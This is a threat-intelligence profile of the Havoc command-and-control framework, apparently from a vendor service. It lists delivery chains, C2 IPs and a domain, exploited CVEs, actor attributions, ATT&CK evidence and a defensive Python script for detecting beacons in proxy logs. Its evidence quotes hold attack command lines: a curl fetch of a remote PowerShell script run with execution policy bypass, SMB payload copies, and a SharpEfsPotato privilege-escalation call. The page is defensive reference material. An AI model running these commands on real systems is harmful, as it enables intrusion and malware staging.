Malware · Ransomware · Used by 19 actors · Exploits 3 CVEs

Havoc

Also known as: havoc_c2, havoc_c2_framework

Havoc is an open-source post-exploitation command-and-control framework used by red teams and increasingly adopted by threat actors as an alternative to Cobalt Strike, Sliver, and Brute Ratel. Its implant is commonly referred to as Demon. Reported capabilities include command execution, host enumeration, encrypted command/result handling, and support for persistent access and payload delivery. The underlying reporting also attributes evasion and anti-analysis features to Havoc or Havoc-derived agents, including indirect syscalls, sleep obfuscation, encrypted memory images, indirect API calls, and API resolution by hash.

Across the provided reporting, Havoc was deployed on Windows systems through multiple infection and execution chains: phishing-delivered ZIP archives containing a decoy document and malicious screen-saver; Windows LNK shortcut chains that launched PowerShell or other LOLBIN-assisted stagers and then executed CPL/DLL payloads to return a Havoc beacon; VBScript-to-PowerShell-to-.NET in-memory loaders that executed Demon without dropping the implant to disk; DLL sideloading via trusted signed applications; malicious npm package delivery; and web-shell-enabled deployment on compromised servers. One Brazil-focused campaign used invoice-themed ZIP files containing a VBScript downloader and MSI package that side-loaded a malicious DLL stager, which then fetched Havoc Demon over the network and persisted via HKCU\Environment\UserInitMprLogonScript. Another observed chain used registry-staged encrypted configuration reconstructed in memory by a sideloaded intermediary loader, behavior explicitly aligned with Havoc.

Observed behavior includes HTTP/HTTPS-based C2 communications and periodic beaconing. Specific network and configuration artifacts directly mentioned in the content include a Havoc stager using GET /stage/ and POST /api/v2/telemetry/diag with user-agent Microsoft-Delivery-Optimization/10.1 to 194.59.31.192:8443; associated mutex Global{7f3a9c2e-4b1d-8e5f-a6d0-3c9b2e1f7a4d}; and recovered Demon configurations using HTTP POST / or /api with a Chrome-like user-agent. Additional reported C2 or callback infrastructure associated with Havoc deployments includes 107.148.41.114, 77.72.85.62, 143.198.183.46, 194.62.55.81:80, 64.176.37.107:443, and 45.77.46.245:443. One report identified a Havoc C2 teamserver at 217.154.217.139 with redirector 217.154.162.45 and TLS CN wawsenti.duckdns.org.

Threat activity in the content links Havoc to multiple actors and campaigns. Sophos reported Cluster Charlie in Operation Crimson Palace, assessed as part of a Chinese state-directed cyberespionage campaign targeting a Southeast Asian government agency and related regional organizations, using Havoc via web shells, DLL sideloading, and repeated redeployment. Cato documented a French-speaking actor tracked as Poisson using a multi-stage in-memory chain ending in Havoc Demon against a small French automotive business, alongside scheduled-task persistence, Explorer.exe injection, RustDesk, OpenSSH Server, and Tailscale. CTU reporting tied Havoc use to GOLD ENCOUNTER/PayoutsKing ransomware intrusions, where it was launched via DLL sideloading and accompanied by SSH backdoors through AdaptixC2 or OpenSSH. Additional reporting associated Havoc with campaigns against a government organization, Brazilian invoice-themed phishing, and pro-Ukrainian hacktivist-linked intrusions where a payload named demon.x64.exe communicated with 77.72.85.62.

Targeting reflected in the content spans government, public service, automotive, healthcare, aviation, and broader enterprise environments, primarily on Windows, with some references to operators already having a Havoc agent on macOS and to HTTP-based C2 on Linux servers. A Havoc-derived private Mythic-compatible backdoor named Loki was reported targeting more than a dozen Russian companies; researchers stated Loki inherited Havoc techniques such as encrypted memory, indirect API calls, and hashed API lookup.

High-confidence indicators and artifacts directly mentioned include the names Demon and demon.x64.exe; C2 IPs/domains 194.59.31.192, 107.148.41.114, 77.72.85.62, 143.198.183.46, 194.62.55.81, 64.176.37.107, 45.77.46.245, 217.154.217.139, 217.154.162.45, and wawsenti.duckdns.org; URIs /stage/, /api/v2/telemetry/diag, /, and /api; user-agents Microsoft-Delivery-Optimization/10.1 and Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36; and persistence via scheduled tasks, startup shortcuts, Explorer.exe injection, and HKCU\Environment\UserInitMprLogonScript.
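A defender-side check built from the network artifacts listed above, added here as an example and not taken from Mallory or the cited reports: it flags proxy records that match the reported C2 addresses, stager URIs and user-agent, and separately surfaces near-constant request intervals between one client and one host (periodic beaconing). The proxy-log layout, its regex and the sample lines are constructed assumptions; adapt them to your own telemetry.

```python
import re
from collections import defaultdict
from datetime import datetime
# Network indicators quoted in the reporting summarised above.
HAVOC_C2_IPS = {"194.59.31.192", "107.148.41.114", "77.72.85.62", "143.198.183.46", "194.62.55.81",
                "64.176.37.107", "45.77.46.245", "217.154.217.139", "217.154.162.45"}
HAVOC_URIS = {"/stage/", "/api/v2/telemetry/diag"}
STAGER_UA = "Microsoft-Delivery-Optimization/10.1"
# Constructed proxy-log layout (hypothetical); adapt the regex to your own proxy's format.
LINE_RE = re.compile(r'^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>[^:\s]+)(?::(?P<port>\d+))? '
                     r'method=(?P<method>\S+) uri=(?P<uri>\S+) ua="(?P<ua>[^"]*)"$')

def classify(rec):
    """Return the reasons one request looks like Havoc stager or beacon traffic (empty if none)."""
    reasons = []
    if rec["dst"] in HAVOC_C2_IPS:
        reasons.append("destination matches reported Havoc C2 address")
    if rec["uri"] in HAVOC_URIS:
        reasons.append("URI matches reported Havoc stager path")
    # The Delivery Optimization UA is normal towards Microsoft CDNs, so flag it only with a stager path or a non-Microsoft host.
    if rec["ua"] == STAGER_UA and (rec["uri"] in HAVOC_URIS or not rec["dst"].endswith(".microsoft.com")):
        reasons.append("Delivery-Optimization UA towards an unexpected destination")
    return reasons

def beacon_pairs(records, min_hits=4, max_jitter_s=5.0):
    """Return (src, dst) pairs with near-constant request intervals, i.e. periodic beaconing."""
    by_pair = defaultdict(list)
    for r in records:
        by_pair[(r["src"], r["dst"])].append(datetime.fromisoformat(r["ts"].replace("Z", "+00:00")))
    periodic = []
    for pair, times in by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if max(gaps) - min(gaps) <= max_jitter_s:
            periodic.append((pair, round(sum(gaps) / len(gaps), 1)))
    return periodic

def scan(lines):
    """Parse log lines and return (indicator hits, periodic beaconing pairs)."""
    records = [m.groupdict() for m in map(LINE_RE.match, lines) if m]
    hits = [(r["ts"], r["src"], r["dst"], why) for r in records if (why := classify(r))]
    return hits, beacon_pairs(records)

# Constructed sample: one stager fetch and three beacons to the reported C2, plus one benign Delivery Optimization request.
SAMPLE_LOG = [
    '2026-05-02T10:00:00Z src=10.0.0.5 dst=194.59.31.192:8443 method=GET uri=/stage/ ua="Microsoft-Delivery-Optimization/10.1"',
    '2026-05-02T10:01:00Z src=10.0.0.5 dst=194.59.31.192:8443 method=POST uri=/api/v2/telemetry/diag ua="Microsoft-Delivery-Optimization/10.1"',
    '2026-05-02T10:02:00Z src=10.0.0.5 dst=194.59.31.192:8443 method=POST uri=/api/v2/telemetry/diag ua="Microsoft-Delivery-Optimization/10.1"',
    '2026-05-02T10:03:00Z src=10.0.0.5 dst=194.59.31.192:8443 method=POST uri=/api/v2/telemetry/diag ua="Microsoft-Delivery-Optimization/10.1"',
    '2026-05-02T10:01:30Z src=10.0.0.7 dst=dl.delivery.mp.microsoft.com method=GET uri=/filestreamingservice/files/abc ua="Microsoft-Delivery-Optimization/10.1"',
]
```

Calling `scan(SAMPLE_LOG)` returns four indicator hits for 10.0.0.5 and one beaconing pair with a 60-second period; the Microsoft CDN request is not flagged.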


EXPLOITED CVES

Vulnerabilities exploited

3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

CVE-2026-3502: TrueConf Client Update Integrity Check Bypass Leading to Arbitrary Code Execution (Exploited in the wild)

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a flaw in TrueConf Client, tracked as CVE-2026-3502 (CVSS score of 7.8), to its Known Exploited Vulnerabilities (KEV) catalog. CVE-2026-3502 is a flaw in TrueConf Client that allows it to download and install updates without verifying them. Attackers who can tamper with the update source can deliver malicious files, leading to arbitrary code execution on the system.

Attackers replaced update files with malicious ones, tricking users into installing them. This delivered the Havoc framework, enabling control, surveillance, and persistence.

via Security Affairs (securityaffairs.com)
CVE-2025-61932: RCE in MOTEX LANSCOPE Endpoint Manager On-Premises MR/DA (Exploited in the wild)

Researchers at Sophos recently discovered that in mid-2025, Bronze Butler (a.k.a. Tick, RedBaldKnight, Stalker Panda, Swirl Typhoon) exploited a critical vulnerability in Lanscope when it was still a zero-day... Motex disclosed a vulnerability designated CVE-2025-61932... Motex has released a fix... CISA added CVE-2025-61932 to its Known Exploited Vulnerabilities (KEV) catalog.

via Dark Reading (darkreading.com)
CVE-2025-8088: WinRAR Windows Path Traversal via NTFS Alternate Data Streams (Exploited in the wild)

Attack chains mounted by the adversary have been found to abuse CVE-2025-8088, a now-patched security flaw impacting RARLAB WinRAR that allows for arbitrary code execution when specially crafted archives are opened by targets. The exploitation of the vulnerability was observed about eight days after its public disclosure in August.

via The Hacker News (thehackernews.com)
THREAT ACTORS

Groups observed using it

19 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

GOLD ENCOUNTER

The group has also used a DLL sideloading technique to launch the Havoc C2 post-exploitation framework, and establishes an SSH backdoor via AdaptixC2 or OpenSSH.

via Sophos (sophos.com)
TeamPCP

Havoc C2 for post-exploitation tasks like pivoting through compromised hosts into internal networks, privilege escalation, and maintaining stealth

via TheRavenFile blog (theravenfile.com)
Amaranth-Dragon

The TrueChaos campaign has been found to weaponize this flaw in the update mechanism to likely deploy the open-source Havoc command-and-control (C2) framework to vulnerable endpoints.

via The Hacker News (thehackernews.com)
Fox Kitten

The group uses a combination of living-off-the-land tools (like ligolo, socat, proxychains) and post-exploitation frameworks (like Havoc, MeshCentral, and custom C2 binaries) across Linux and cloud systems.

via Sysdig blog (webflow.sysdig.com)
FIN7

What once ended with a $300 gift card purchase now ends with a modified Havoc C2 framework burrowed into your environment... deploying a mix of custom Havoc Demon payloads...

via Huntress blog (huntress.com)
KTA440

"...used to execute the Havoc command-and-control (C2) framework."

via The Hacker News (thehackernews.com)
MITRE ATT&CK

Techniques & procedures

27 distinct techniques documented for this family, organized by ATT&CK tactic.

Reconnaissance

1 technique
T1598 Phishing for Information (Evidence: 1)

What we are going to do is phish the local admin for their credentials, store them in PowerShell and then relay those credentials to run a scheduled task that calls our beacon in higher integrity.

Initial Access

1 technique
T1133 External Remote Services (Evidence: 1)

The most significant aspect of the attack was the attacker's installation of OpenSSH Server and Tailscale on a victim's machine, creating a covert access channel independent of the command-and-control server. Even after the Havoc infrastructure went offline, the attacker maintained access through this separate, encrypted mesh network.

Execution

6 techniques
T1047 Windows Management Instrumentation (Evidence: 1)

the attackers used a command shell session spawned from the malicious DLL to move laterally via WMIC, and to deploy the open-source SharpHound tool...

T1053.005 Scheduled Task (Evidence: 3)

That username and password is then passed to schtasks to schedule a task that executes our APCTest.exe executable at a specified time.

T1059.001 PowerShell (Evidence: 4)

We can simply run this script using invoke-expression since Havoc doesn’t have a PowerShell-Import function. I host the script and IEX it through Havoc.

T1059.003 Windows Command Shell (Evidence: 1)

the attackers used the shell to execute commands on the targeted web app server... /c wevtutil qe ... /c WMIC ... findstr /i /c:exclude /c:whitelist /c:blocklist

T1059.005 Visual Basic (Evidence: 2)

The attacker utilized a multi-stage in-memory malware chain, including a VBScript stager, a PowerShell loader, and Havoc's Demon agent, to gain initial access.

T1574.001 DLL (Evidence: 2)

Windows 11 Mock Directory UAC Bypass Using DLL Hijacking ... For this demo we are going to use one of the ComputerDefaults.exe DLLs ... if we put a malicious DLL file in that directory ... the service will start and run our DLL with the privileges of that service.

Persistence

4 techniques
T1053.005 Scheduled Task (Evidence: 3)

That username and password is then passed to schtasks to schedule a task that executes our APCTest.exe executable at a specified time.

T1133 External Remote Services (Evidence: 1)

The most significant aspect of the attack was the attacker's installation of OpenSSH Server and Tailscale on a victim's machine, creating a covert access channel independent of the command-and-control server. Even after the Havoc infrastructure went offline, the attacker maintained access through this separate, encrypted mesh network.

T1505.003 Web Shell (Evidence: 2)

Using previously stolen credentials, the attackers deployed a web shell to a web application server using its built-in file upload feature... They then used the web shell to execute commands on the targeted web app server.

T1543.001 Launch Agent (Evidence: 1)

LaunchAgents - user-level persistence (T1543.001)… A LaunchAgent is a plist file that tells launchd to run a specific binary at user login… SIP does not prevent writing to ~/Library/LaunchAgents/.

Privilege Escalation

5 techniques
T1053.005 Scheduled Task (Evidence: 3)

That username and password is then passed to schtasks to schedule a task that executes our APCTest.exe executable at a specified time.

T1055 Process Injection (Evidence: 5)

After executing the chain, we get a beacon back with our process injected into RuntimeBroker.exe

T1068 Exploitation for Privilege Escalation (Evidence: 1)

Now that we have a high integrity beacon, we can use the SharpEfsPotato tool to get system ... dotnet inline-execute /home/kali/Desktop/SharpEfsPotato.exe -p C:\Users\User\Downloads\aese.exe ... the last is at System level privileges.

T1543.001 Launch Agent (Evidence: 1)

LaunchAgents - user-level persistence (T1543.001)… A LaunchAgent is a plist file that tells launchd to run a specific binary at user login… SIP does not prevent writing to ~/Library/LaunchAgents/.

T1548.002 Bypass User Account Control (Evidence: 3)

The most important thing here is that we did not receive a UAC prompt... it’s interesting that this does get around UAC, even if the box is set to always-notify.

Stealth

9 techniques
T1027 Obfuscated Files or Information (Evidence: 2)

Harriet is a payload framework ... The tool will encrypt the shellcode and the function calls ... For this demo, I’m just going to choose the first option, Fully-Automated AES Encryption.

T1027.013 Encrypted/Encoded File (Evidence: 1)

Encrypted C2 traffic. A fresh AES key is negotiated at first contact; all later traffic is encrypted.

T1036 Masquerading (Evidence: 2)

copying the application’s dynamic linking library (DLL) to a web documents folder and disguising it as a PDF... another malicious DLL masquerading as an .ini file... deployed the XieBroC2 framework as a backup... renamed jconsole.exe, this time renamed firefox.exe

T1036.001 Invalid Code Signature (Evidence: 1)

The MSI also has no digital signature ... Only mpextms.exe is signed. The stager DLL is not.

T1055 Process Injection (Evidence: 5)

After executing the chain, we get a beacon back with our process injected into RuntimeBroker.exe

T1140 Deobfuscate/Decode Files or Information (Evidence: 1)

The VBS hides its intent behind string splitting. Deobfuscated, the VBS launches a hidden cmd that downloads the MSI from Google Cloud Storage

T1218.011 Rundll32 (Evidence: 1)

the threat actor using credentials stolen from an unmanaged device and a dropped web shell. The attackers used the shell to execute rundll32.exe, injecting a malicious Havoc DLL...

T1574.001 DLL (Evidence: 2)

Windows 11 Mock Directory UAC Bypass Using DLL Hijacking ... For this demo we are going to use one of the ComputerDefaults.exe DLLs ... if we put a malicious DLL file in that directory ... the service will start and run our DLL with the privileges of that service.

T1620 Reflective Code Loading (Evidence: 1)

We can run this in memory within Havoc using the dotnet command. dotnet inline-execute /home/kali/Desktop/SharpUp.exe audit ... enter the high integrity beacon on your Havoc C2 and run it the same way you ran HighBorn.

Discovery

2 techniques
T1018 Remote System Discovery (Evidence: 2)

the attackers used the Havoc tool to inject code into other processes, which would in turn deploy the open-source SharpHound tool for Active Directory infrastructure mapping.

T1518.001 Security Software Discovery (Evidence: 1)

the injected process used WMIC to query Windows Defender exclusion paths... It also queried the Sophos registry to better understand the “PolicyConfiguration,” “threat policy,” and “Poll Server” Registry values

Lateral Movement

1 technique
T1021.002 SMB/Windows Admin Shares (Evidence: 1)

cmd /c "copy c:\users\public\temp.log \\172.xxx.xxx.xxx\c$\windows\temp && copy c:\users\public\pp.exe \\172.xxx.xxx.xxx\c$\perflogs\conhost.exe"

Command and Control

3 techniques
T1071 Application Layer Protocol (Evidence: 5)

This resulted in a callback to Havoc.

T1090 Proxy (Evidence: 1)

In MITRE ATT&CK terms these are specific techniques: Proxy (T1090, Command and Control) - routing C2 traffic through an intermediate node

T1105 Ingress Tool Transfer (Evidence: 3)

cd C:\Windows\Tasks\; curl -o runner.ps1 http://192.168.1.29:9090/runner.md; powershell -exec bypass .\runner.ps1

Exfiltration

1 technique
T1041 Exfiltration Over C2 Channel (Evidence: 1)

Exfiltration of data of intelligence value was still an objective after the resumption of activity.

INDICATORS OF COMPROMISE

IOCs tracked for this family

75 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network: 28 tracked. IPs, domains, and DNS infrastructure linked to this family.

Hashes: 41 tracked. File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other: 6 tracked. Other indicator types observed in public reporting.
